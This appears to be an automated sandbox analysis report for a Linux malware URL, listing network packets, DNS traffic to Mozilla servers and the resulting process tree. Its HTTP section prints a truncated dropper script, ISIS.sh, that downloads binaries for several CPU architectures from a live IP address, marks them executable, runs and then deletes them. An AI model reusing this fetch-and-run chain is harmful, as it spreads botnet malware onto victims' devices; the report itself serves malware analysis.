Dec 25, 2024 08:04:51.643336058 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:52.084846973 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:52.085061073 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:52.086652040 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:52.086797953 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:52.086819887 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:52.086844921 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:52.086850882 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:12.213898897 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:12.213937998 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:12.214001894 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:12.216675997 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:12.216687918 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.433052063 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.433181047 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:13.436553001 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:13.436566114 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.436752081 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.439007998 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:13.479352951 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.924622059 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.924854040 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.927171946 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:13.927303076 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:13.927329063 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:13.927347898 CET	43796	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:13.927355051 CET	443	43796	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:54.063726902 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:54.063770056 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:54.063859940 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:54.064644098 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:54.064661980 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.288749933 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.288898945 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:55.292351007 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:55.292361021 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.292448044 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.295331955 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:55.343327045 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.781904936 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.782126904 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.785770893 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:55.785908937 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:55.785924911 CET	443	43798	34.107.243.93	192.168.2.20
Dec 25, 2024 08:05:55.785964966 CET	43798	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:05:55.785972118 CET	443	43798	34.107.243.93	192.168.2.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 25, 2024 08:04:31.435254097 CET	47526	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:31.435254097 CET	47526	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:31.557513952 CET	53	47526	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:31.557528019 CET	53	47526	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:31.560142994 CET	54233	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:31.560142994 CET	54233	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:31.682475090 CET	53	54233	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:31.682507992 CET	53	54233	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:38.404207945 CET	36684	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:38.404207945 CET	36684	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:38.405240059 CET	60337	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:38.527071953 CET	53	36684	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:38.527113914 CET	53	36684	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:38.527452946 CET	53	60337	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:50.241636038 CET	54024	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:50.241636038 CET	54024	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:50.241785049 CET	44652	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:04:50.364258051 CET	53	54024	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:50.364295006 CET	53	54024	8.8.8.8	192.168.2.20
Dec 25, 2024 08:04:50.376296043 CET	53	44652	8.8.8.8	192.168.2.20
Dec 25, 2024 08:05:12.088418007 CET	33656	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:05:12.088476896 CET	33656	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:05:12.091212988 CET	44509	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:05:12.210961103 CET	53	33656	8.8.8.8	192.168.2.20
Dec 25, 2024 08:05:12.211009026 CET	53	33656	8.8.8.8	192.168.2.20
Dec 25, 2024 08:05:12.213450909 CET	53	44509	8.8.8.8	192.168.2.20
Dec 25, 2024 08:05:53.929126024 CET	34298	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:05:53.929126024 CET	34298	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:05:53.929589987 CET	40466	53	192.168.2.20	8.8.8.8
Dec 25, 2024 08:05:54.051572084 CET	53	34298	8.8.8.8	192.168.2.20
Dec 25, 2024 08:05:54.063344955 CET	53	40466	8.8.8.8	192.168.2.20
Dec 25, 2024 08:05:54.063564062 CET	53	34298	8.8.8.8	192.168.2.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 25, 2024 08:04:31.435254097 CET	192.168.2.20	8.8.8.8	0x3efc	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:31.435254097 CET	192.168.2.20	8.8.8.8	0x85f0	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 25, 2024 08:04:31.560142994 CET	192.168.2.20	8.8.8.8	0xee9f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:31.560142994 CET	192.168.2.20	8.8.8.8	0x4165	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 25, 2024 08:04:38.404207945 CET	192.168.2.20	8.8.8.8	0x7292	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:38.404207945 CET	192.168.2.20	8.8.8.8	0x69db	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 25, 2024 08:04:38.405240059 CET	192.168.2.20	8.8.8.8	0x850f	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:50.241636038 CET	192.168.2.20	8.8.8.8	0xf813	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:50.241636038 CET	192.168.2.20	8.8.8.8	0x3559	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 25, 2024 08:04:50.241785049 CET	192.168.2.20	8.8.8.8	0x20f3	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:12.088418007 CET	192.168.2.20	8.8.8.8	0xfcf	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:12.088476896 CET	192.168.2.20	8.8.8.8	0x9964	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 25, 2024 08:05:12.091212988 CET	192.168.2.20	8.8.8.8	0x5bab	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:53.929126024 CET	192.168.2.20	8.8.8.8	0xad3d	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:53.929126024 CET	192.168.2.20	8.8.8.8	0x5933	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 25, 2024 08:05:53.929589987 CET	192.168.2.20	8.8.8.8	0x22eb	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 25, 2024 08:04:12.347215891 CET	8.8.8.8	192.168.2.20	0x120	No error (0)	d228z91au11ukj.cloudfront.net		3.164.85.17	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:12.347215891 CET	8.8.8.8	192.168.2.20	0x120	No error (0)	d228z91au11ukj.cloudfront.net		3.164.85.87	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:12.347215891 CET	8.8.8.8	192.168.2.20	0x120	No error (0)	d228z91au11ukj.cloudfront.net		3.164.85.9	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:12.347215891 CET	8.8.8.8	192.168.2.20	0x120	No error (0)	d228z91au11ukj.cloudfront.net		3.164.85.24	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:31.553626060 CET	8.8.8.8	192.168.2.20	0xbbd2	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 25, 2024 08:04:31.553626060 CET	8.8.8.8	192.168.2.20	0xbbd2	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:31.557528019 CET	8.8.8.8	192.168.2.20	0x3efc	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:31.565501928 CET	8.8.8.8	192.168.2.20	0x877a	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 25, 2024 08:04:31.682475090 CET	8.8.8.8	192.168.2.20	0xee9f	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:33.581902981 CET	8.8.8.8	192.168.2.20	0xd395	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 25, 2024 08:04:33.581902981 CET	8.8.8.8	192.168.2.20	0xd395	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 25, 2024 08:04:33.583846092 CET	8.8.8.8	192.168.2.20	0x19bf	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 25, 2024 08:04:33.583846092 CET	8.8.8.8	192.168.2.20	0x19bf	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 25, 2024 08:04:38.527071953 CET	8.8.8.8	192.168.2.20	0x7292	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:38.527452946 CET	8.8.8.8	192.168.2.20	0x850f	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:50.364258051 CET	8.8.8.8	192.168.2.20	0xf813	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:04:50.376296043 CET	8.8.8.8	192.168.2.20	0x20f3	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:12.211009026 CET	8.8.8.8	192.168.2.20	0xfcf	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:12.213450909 CET	8.8.8.8	192.168.2.20	0x5bab	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:54.063344955 CET	8.8.8.8	192.168.2.20	0x22eb	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 25, 2024 08:05:54.063564062 CET	8.8.8.8	192.168.2.20	0xad3d	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

push.services.mozilla.com

167.114.127.95

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	58476	167.114.127.95	80

Timestamp	Bytes transferred	Direction	Data
Dec 25, 2024 08:04:11.817378998 CET	341	OUT	GET /ISIS.sh HTTP/1.1 Host: 167.114.127.95 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1
Dec 25, 2024 08:04:12.457882881 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Dec 2024 07:04:12 GMT Server: Apache/2.4.62 (Debian) Last-Modified: Mon, 23 Dec 2024 13:45:15 GMT ETag: "801-629f034da9d1a" Accept-Ranges: bytes Content-Length: 2049 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/x-sh Data Raw: 2d 65 20 23 21 2f 62 69 6e 2f 62 61 73 68 0a 2d 65 20 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 36 37 2e 31 31 34 2e 31 32 37 2e 39 35 2f 6d 2d 69 2e 70 2d 73 2e 49 53 49 53 3b 20 63 68 6d 6f 64 20 2b 78 20 6d 2d 69 2e 70 2d 73 2e 49 53 49 53 3b 20 2e 2f 6d 2d 69 2e 70 2d 73 2e 49 53 49 53 3b 20 72 6d 20 2d 72 66 20 6d 2d 69 2e 70 2d 73 2e 49 53 49 53 0a 2d 65 20 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 36 37 2e 31 31 34 2e 31 32 37 2e 39 35 2f 6d 2d 70 2e 73 2d 6c 2e 49 53 49 53 3b 20 63 68 6d 6f 64 20 2b 78 20 6d 2d 70 2e 73 2d 6c 2e 49 53 49 53 3b 20 2e 2f 6d 2d 70 2e 73 2d 6c 2e 49 53 49 53 3b 20 72 6d 20 2d 72 66 20 6d 2d 70 2e 73 2d 6c 2e 49 53 49 53 0a 2d 65 20 63 64 20 2f [TRUNCATED] Data Ascii: -e #!/bin/bash-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/m-i.p-s.ISIS; chmod +x m-i.p-s.ISIS; ./m-i.p-s.ISIS; rm -rf m-i.p-s.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/m-p.s-l.ISIS; chmod +x m-p.s-l.ISIS; ./m-p.s-l.ISIS; rm -rf m-p.s-l.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/s-h.4-.ISIS; chmod +x s-h.4-.ISIS; ./s-h.4-.ISIS; rm -rf s-h.4-.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/x-8.6-.ISIS; chmod +x x-8.6-.ISIS; ./x-8.6-.ISIS; rm -rf x-8.6-.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/a-r.m-6.ISIS; chmod +x a-r.m-6.ISIS; ./a-r.m-6.ISIS; rm -rf a-r.m-6.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/x-3.2-.ISIS; chmod +x x-3.2-.ISIS; ./x-3.2-.ISIS; rm -rf
Dec 25, 2024 08:04:12.457969904 CET	1123	IN	Data Raw: 20 78 2d 33 2e 32 2d 2e 49 53 49 53 0a 2d 65 20 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f Data Ascii: x-3.2-.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/a-r.m-7.ISIS; chmod +x a-r.m-7.ISIS; ./a-r.m-7.ISIS; rm -rf a-r.m-7.ISIS-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://16

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	43788	34.107.243.93	443

Timestamp	Bytes transferred	Direction	Data
2024-12-25 07:04:32 UTC	522	OUT	GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: 3RFpl8rVF1YDHCZlhxUbwQ== Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket
2024-12-25 07:04:33 UTC	220	IN	HTTP/1.1 500 Internal Server Error Content-Length: 81 content-type: application/json date: Wed, 25 Dec 2024 07:04:32 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-25 07:04:33 UTC	81	IN	Data Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 65 72 72 6e 6f 22 3a 35 30 30 2c 22 65 72 72 6f 72 22 3a 22 41 63 74 69 78 20 57 65 62 20 65 72 72 6f 72 3a 20 57 65 62 53 6f 63 6b 65 74 20 75 70 67 72 61 64 65 20 69 73 20 65 78 70 65 63 74 65 64 22 7d Data Ascii: {"code":500,"errno":500,"error":"Actix Web error: WebSocket upgrade is expected"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.20	43792	34.107.243.93	443

Timestamp	Bytes transferred	Direction	Data
2024-12-25 07:04:39 UTC	522	OUT	GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: HFyf3WrBS00zoqbXYE09qw== Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket
2024-12-25 07:04:40 UTC	220	IN	HTTP/1.1 500 Internal Server Error Content-Length: 81 content-type: application/json date: Wed, 25 Dec 2024 07:04:39 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-25 07:04:40 UTC	81	IN	Data Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 65 72 72 6e 6f 22 3a 35 30 30 2c 22 65 72 72 6f 72 22 3a 22 41 63 74 69 78 20 57 65 62 20 65 72 72 6f 72 3a 20 57 65 62 53 6f 63 6b 65 74 20 75 70 67 72 61 64 65 20 69 73 20 65 78 70 65 63 74 65 64 22 7d Data Ascii: {"code":500,"errno":500,"error":"Actix Web error: WebSocket upgrade is expected"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.20	43794	34.107.243.93	443

Timestamp	Bytes transferred	Direction	Data
2024-12-25 07:04:51 UTC	522	OUT	GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: ofHqArSBqY+ooDxDEZfg4w== Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket
2024-12-25 07:04:52 UTC	220	IN	HTTP/1.1 500 Internal Server Error Content-Length: 81 content-type: application/json date: Wed, 25 Dec 2024 07:04:51 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-25 07:04:52 UTC	81	IN	Data Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 65 72 72 6e 6f 22 3a 35 30 30 2c 22 65 72 72 6f 72 22 3a 22 41 63 74 69 78 20 57 65 62 20 65 72 72 6f 72 3a 20 57 65 62 53 6f 63 6b 65 74 20 75 70 67 72 61 64 65 20 69 73 20 65 78 70 65 63 74 65 64 22 7d Data Ascii: {"code":500,"errno":500,"error":"Actix Web error: WebSocket upgrade is expected"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.20	43796	34.107.243.93	443

Timestamp	Bytes transferred	Direction	Data
2024-12-25 07:05:13 UTC	522	OUT	GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: XoH07eatCgUjuFbAxb5EEg== Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket
2024-12-25 07:05:13 UTC	220	IN	HTTP/1.1 500 Internal Server Error Content-Length: 81 content-type: application/json date: Wed, 25 Dec 2024 07:05:13 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-25 07:05:13 UTC	81	IN	Data Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 65 72 72 6e 6f 22 3a 35 30 30 2c 22 65 72 72 6f 72 22 3a 22 41 63 74 69 78 20 57 65 62 20 65 72 72 6f 72 3a 20 57 65 62 53 6f 63 6b 65 74 20 75 70 67 72 61 64 65 20 69 73 20 65 78 70 65 63 74 65 64 22 7d Data Ascii: {"code":500,"errno":500,"error":"Actix Web error: WebSocket upgrade is expected"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.20	43798	34.107.243.93	443

Timestamp	Bytes transferred	Direction	Data
2024-12-25 07:05:55 UTC	522	OUT	GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: TyNYcaSXRAv88bBjN+shZA== Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket
2024-12-25 07:05:55 UTC	220	IN	HTTP/1.1 500 Internal Server Error Content-Length: 81 content-type: application/json date: Wed, 25 Dec 2024 07:05:55 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-25 07:05:55 UTC	81	IN	Data Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 65 72 72 6e 6f 22 3a 35 30 30 2c 22 65 72 72 6f 72 22 3a 22 41 63 74 69 78 20 57 65 62 20 65 72 72 6f 72 3a 20 57 65 62 53 6f 63 6b 65 74 20 75 70 67 72 61 64 65 20 69 73 20 65 78 70 65 63 74 65 64 22 7d Data Ascii: {"code":500,"errno":500,"error":"Actix Web error: WebSocket upgrade is expected"}

System Behavior

Analysis Process: exo-open PID: 4740, Parent PID: 4680

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/exo-open
Arguments:	exo-open http://167.114.127.95/ISIS.sh
File size:	22856 bytes
MD5 hash:	39c5fa78f1cb3d950b9944f784018d3a

Chronological Activities

Analysis Process: exo-open PID: 4747, Parent PID: 4740

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/exo-open
Arguments:	-
File size:	22856 bytes
MD5 hash:	39c5fa78f1cb3d950b9944f784018d3a

Chronological Activities

Analysis Process: exo-open PID: 4748, Parent PID: 4747

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/exo-open
Arguments:	-
File size:	22856 bytes
MD5 hash:	39c5fa78f1cb3d950b9944f784018d3a

Chronological Activities

Analysis Process: exo-helper-1 PID: 4748, Parent PID: 1656

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 --launch WebBrowser http://167.114.127.95/ISIS.sh
File size:	63560 bytes
MD5 hash:	c27a648e34ba5ce625d064af015be147

Chronological Activities

Analysis Process: exo-helper-1 PID: 4755, Parent PID: 4748

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1
Arguments:	-
File size:	63560 bytes
MD5 hash:	c27a648e34ba5ce625d064af015be147

Chronological Activities

Analysis Process: sensible-browser PID: 4755, Parent PID: 4748

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/sensible-browser
Arguments:	/bin/sh /usr/bin/sensible-browser http://167.114.127.95/ISIS.sh
File size:	1132 bytes
MD5 hash:	a5909f49ad9c97574d2b4c49cc24905d

Chronological Activities

Analysis Process: x-www-browser PID: 4755, Parent PID: 4748

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/x-www-browser
Arguments:	/bin/sh /usr/bin/x-www-browser http://167.114.127.95/ISIS.sh
File size:	31 bytes
MD5 hash:	42b33a4578e4a51d8a5d1010c466a9d7

Chronological Activities

Analysis Process: x-www-browser PID: 4762, Parent PID: 4755

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/x-www-browser
Arguments:	-
File size:	31 bytes
MD5 hash:	42b33a4578e4a51d8a5d1010c466a9d7

Chronological Activities

Analysis Process: which PID: 4762, Parent PID: 4755

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/bin/which
Arguments:	/bin/sh /usr/bin/which /usr/bin/x-www-browser
File size:	10 bytes
MD5 hash:	e942f154ef9d9974366551d2d231d936

Chronological Activities

Analysis Process: firefox PID: 4755, Parent PID: 4748

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	/usr/lib/firefox/firefox http://167.114.127.95/ISIS.sh
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4779, Parent PID: 4755

General

Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Analysis Process: firefox PID: 4783, Parent PID: 4755

General

